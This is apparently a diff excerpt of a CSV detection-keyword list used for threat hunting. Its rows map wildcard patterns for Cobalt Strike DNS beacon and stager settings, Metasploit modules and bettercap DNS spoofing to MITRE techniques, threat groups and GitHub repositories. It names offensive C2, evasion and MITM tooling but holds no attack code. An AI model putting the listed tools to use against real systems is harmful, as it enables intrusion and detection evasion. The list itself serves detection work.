APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_ttl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_get_A*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_get_TXT*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_maxdns*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_ns_response*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_put_metadata*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_put_output*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" 
+"*dns_bruteforce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*dns_redir.sh *","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*dns_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dns_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Adversary 
Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*'dns_stager_prepend'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*'dns_stager_subhost'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*dnsadmin_serverlevelplugindll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" 